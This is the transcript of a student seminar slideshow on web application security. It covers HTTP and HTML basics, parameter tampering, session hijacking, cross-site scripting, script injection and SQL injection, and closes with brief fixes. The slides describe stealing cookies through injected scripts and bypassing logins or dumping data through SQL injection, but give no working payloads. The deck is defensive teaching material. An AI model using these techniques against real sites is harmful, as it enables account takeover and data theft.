Presentation is loading. Please wait.

Presentation is loading. Please wait.

SDBI Seminar Web Application Security Name: Lior Ateret.

Published byHelena Tate Modified over 8 years ago

Similar presentations

Presentation on theme: "SDBI Seminar Web Application Security Name: Lior Ateret."— Presentation transcript:

1 SDBI Seminar Web Application Security Name: Lior Ateret

2 Table of Contents Introduction Parameter Tampering SQL Injection Solutions Solutions Web application, HTTP and HTML The most basic attack Attacking the client Direct attack on the DataBase How can we fix our application? Cross Site Scripting and Script Injection

3 What is a Web Application ? A software application, executed by a web server, which responds to dynamic web page requests over HTTP. (from webappsec.org) (from webappsec.org) The difference between web Application and and software application is the application's GUI. Introduction

4 The majority of occurring software security holes in web applications may be sorted into just two categories: The majority of occurring software security holes in web applications may be sorted into just two categories: Failure to deal with meta characters. Authorization problems due to giving too much trust in input. Introduction

5 The Source of the Vulnerabilities Applications assume that the client behaves in an expected manner. Programmers only try to anticipate the user controlled input in the designated fields. But the client can be controlled by the user. The data from the client can be manipulated using various tools. Introduction

6 bEavesdroppingAttacks SSL SSL Network Attacks Firewall Known Viruses Known Viruses Anti-Virus Anti-Virus New or Unknown VirusesServerHardening Web Application Attacks The Server Defense Rings Malicious Activity WebServer

7 Introduction The only solution is to educate the developers The developers need to know how to look for vulnerabilities The developers need to know how to fix the vulnerabilities correctly TheProblem There is no magic solution Application attacks are more dangerous The vulnerability is usually easy to exploit The vulnerability is usually hard to fix TheSolution

8 HTTP Intro HTTP Intro

9 The HTTP Protocol HTTP is in plain text HTTP is human readable HTTP is stateless HTTP has two versions 1.0 and 1.1 The HTTP Request Flow: 1. HTTP request is sent to the server 2. HTTP response is sent back to the client with HTML client with HTML

10 The request has three sections The URL The headers The content It is possible to send parameters to the server There are many types of HTTP request The type of the request is set at the first section In a 'GET' request the parameter is send in the URL In a 'POST' request it is in the content HTTP Request

11 HTTP GET request GET /search?search=sdbi%20seminar HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Accept: text/xml,application/xml,text/html; Accept-Language: en-us,en;q=0.7,he;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: keep-alive

12 HTTP POST request POST /search HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Accept: text/xml,application/xml,text/html; Accept-Language: en-us,en;q=0.7,he;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: keep-alive Content-Length: 22 search=sdbi%20seminar

13 HTTP Response Almost the same as the HTTP request The server set the status of the request in the first section of the response 200 is OK 404 is not found

14 HTTP Response HTTP/1.1 200 OK Server: GWS/2.1 Cache-Control: private Content-Type: text/html Date: Sat, 28 Jan 2006 02:51:53 GMT...

15 HTML Intro HTML Intro

16 HyperText Markup Language A format that combines text and extra information about the text The “extra information” is store inside HTML tags text HTML

17 The FORM tag The FORM tag is used to send parameters to a web server. The FORM tag set where to the parameters and how will they be send (GET or POST) Inside of the FORM tag there are usually more tag that request the parameters form the user The INPUT tag for text and buttons The SELECT tag for combo box HTML

18 Student name: Student name: Hair color: Hair color: blue blue green green red red HTML

19 Table of Contents Introduction Parameter Tampering SQL Injection Solutions Solutions Web application, HTTP and HTML The most basic attack Attacking the client Direct attack on the DataBase How can we fix our application? Cross Site Scripting and Script Injection

20 Parameter Tampering

21 The most simple form of application level attack This attack doesn't require almost any or Hacking skill and can be done without any no tools This attack takes advantage of the basic fact that programmers relay parameters through the client Parameter Tampering

22 Programmers transfer data to and from the client, it done seemingly without letting the user change it But an attacker can control the client and he can change that data that is save in the client-side to a non anticipated value Such parameters include hidden fields, combo boxes, parameters within links, etc. Parameter Tampering

23 Where Can We Find It? It can found in almost any page that receives parameters Parameter Tampering is any form of altering parameters value in HTTP requests Can be done both in URL parameters or in the body of POST requests Parameter Tampering

24 The most common location Forms Hidden Field Manipulation User Selection Manipulation Links Parameters that are sent in GET request Parameter Tampering

25 Forms Parameter Tampering Hidden Field Manipulation Hidden fields can be used to store data server data (instead of using the session) But the “Hidden” field is not that hidden, and can be altered. Parameter Tampering

26 Hidden Field Manipulation

27 Forms Parameter Tampering User Selection Manipulation Users are presented with a combo box or radio button selection between several options Usually no additional checks are performed on the user's input But the user can change the value to any value he chooses Parameter Tampering

28 Loan Request Loan Request Please Enter Your Loan Information: Please Enter Your Loan Information: Loan Sum: Loan Sum: The Number of Payments: The Number of Payments: 3 3 6 6 12 12 24 24 Parameter Tampering - Example

29 User Selection Manipulation

30 Table of Contents Introduction Parameter Tampering SQL Injection Solutions Solutions Web application, HTTP and HTML The most basic attack Attacking the client Direct attack on the DataBase How can we fix our application? Cross Site Scripting and Script Injection

31 There is a need to keep track of a single user’s work on various non related HTTP requests Many time the user authentication is also saved in the session HTTP Sessions

32 The Lifecycle of a Session After user logs-on or connects, a session object is created on the server A unique session identifier is generated for that session and sent back to the user The user’s browser then sends this session ID with each request, allowing the application to associate the request with session The application can store any user specific information in the session’s object memory When logging off, or after a timeout, the session object is destroyed HTTP Sessions

33 The session identifier is usually save in the cookie The session identifier is a very large string that should be very hard to guess But is not always that strong Zvi Gutterman HTTP Sessions guess

34 Session Hijacking is an attack in which the attacker successfully takes control over a user’s session, after obtaining a valid session identifier Through this attack the attacker is able to gain access to the system as if the attacker was authenticated to it, without ever knowing the authentication credentials of the attacked user Session Hijacking

35 Hacker’s request was rejected due to lack of a valid cookie Session Hijacking

36 Hacker’s request was accepted as it contained a valid cookie Session Hijacking

37 Instead of attacking the server we can attack a client Web browser allow web servers to send them scripts that they will run inside the html Client Side Attacks

38 One way of stealing session identifiers is by sending a script to the client that will access the cookie and send it to the attacker The script is able to access the document.cookie object, which contains the cookie information Browser security, however, limits scripts access only to the web site that its from

39 Cross Site Scripting (XSS) A way to perform script-based attacks without being limited by browser security This attack takes advantage of the principal that remote server can send scripts to the client the client is part of the attack process, as the script itself is not permanently stored on the remote system

40 Cross Site Scripting

41 Cross Site Scripting (XSS) Almost every application is, or have been, vulnerable to XSS throughout its life Many major sites, such as Google, Yahoo, Ebay, FBI, CNN, Microsoft, Apple, etc. were vulnerable at some point to XSS Every month dozens of XSS vulnerabilities are discovered in commercial products

42 Cross Site Scripting (XSS) The script, sent by the attacked client to the server was then received again by the client, now with the proper security context, and was able to send the cookie to the attacker

43 Cross Site Scripting

44 Scripts Injection The attacker takes advantage of a component in the system which displays to users information previously inserted by other users With no limitation on the attacker’s input, the attacker is able to insert HTML scripts into the input

45 Scripts Injection

46 The script, now from the web site’s domain, was now able to access sensitive information and send it to the attacker

47 Scripts Injection Potentially vulnerable components Message Boards (Forums) – Allow users to collaborate data all viewed by the browser. User Comments – Product reviews, guest books, etc – all allow inputting information. Contact Forms – Online support, ‘Contact Us’ forms, etc. – Will be reviewed by an operator (likely with higher permissions) Online Messaging, such as Web Mail system

48 Scripts Injection

49 Scripts Attacks Summary While all demonstrated examples focused on cookie theft, Scripts attacks can be used for other purposes as well: Actual data theft Execution of operations within the session Execution of various client-side scripts in a restricted environment

50 Table of Contents Introduction Parameter Tampering SQL Injection Solutions Solutions Web application, HTTP and HTML The most basic attack Attacking the client Direct attack on the DataBase How can we fix our application? Cross Site Scripting and Script Injection

51 SQL Injection SQL Injection is an attack in which the attacker alters the syntax of the SQL statements sent by the application to the server Using SQL Injection the attacker may be able to access sensitive data, bypass access violations or authentication, takeover the server or cause Denial of Service

52 SQL Injection Why Are We Vulnerable? SQL Injection is the result of using simplistic database access mechanism, relying on string based queries In this form of access, the programmer concatenates together syntax and parameters and forms a single string that is sent to the Database The attacker is therefore able to inject SQL syntax into the parameter, which is appended to the query

53 SQL Injection What can we do with SQL injection? we can bypass authentication if SQL is used in the login screen Steal data from the database by using the 'union' sql command even execute commands on the server itself

54 SQL Injection SQL injection is still dangerous even if the SQL display no output back to screen It could still be found easily and exploited

55 SQL Injection

56 Table of Contents Introduction Parameter Tampering SQL Injection Solutions Solutions Web application, HTTP and HTML The most basic attack Attacking the client Direct attack on the DataBase How can we fix our application? Cross Site Scripting and Script Injection

57 Solutions as we already said there is no magic solution The user input must always be checked When displaying user input always encode it first use Stored Procedures for your SQL queries

58 Question? Question?

59 Bibliography Base on the Application Level Security Vulnerabilities by Ofer Maor from www.hacktics.com http://www.microsoft.com/israel/events/default. aspx?event=securedev קבוצת אבטחת מידע למפתחים של מיקרוספט WebAppSec WebAppSecwww.webappsec.org Common Security Problems in the Code of Dynamic Web Applications http://www.webappsec.org/projects/articles/062 105.shtml WebAppSecc glossary http://www.webappsec.org/projects/glossary/

60 Useful Links Web Application Security www.webappsec.org www.owasp.org Hacking “Games” www.hackthissite.org/ www.owasp.org/software/webgoat.htmlhackquest.com

Download ppt "SDBI Seminar Web Application Security Name: Lior Ateret."

Similar presentations

Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
HTTP Hypertext Transfer Protocol. HTTP messages HTTP is the language that web clients and web servers use to talk to each other –HTTP is largely “under.

HTTP Hypertext Transfer Protocol. HTTP messages HTTP is the language that web clients and web servers use to talk to each other –HTTP is largely “under.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
2/9/2004 Web and HTTP February 9, 2004. 2/9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.

2/9/2004 Web and HTTP February 9, /9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.

Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.
Computer Concepts 2014 Chapter 7 The Web and E-mail.

Computer Concepts 2014 Chapter 7 The Web and .
Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.

Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.

Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

Similar presentations

Ads by Google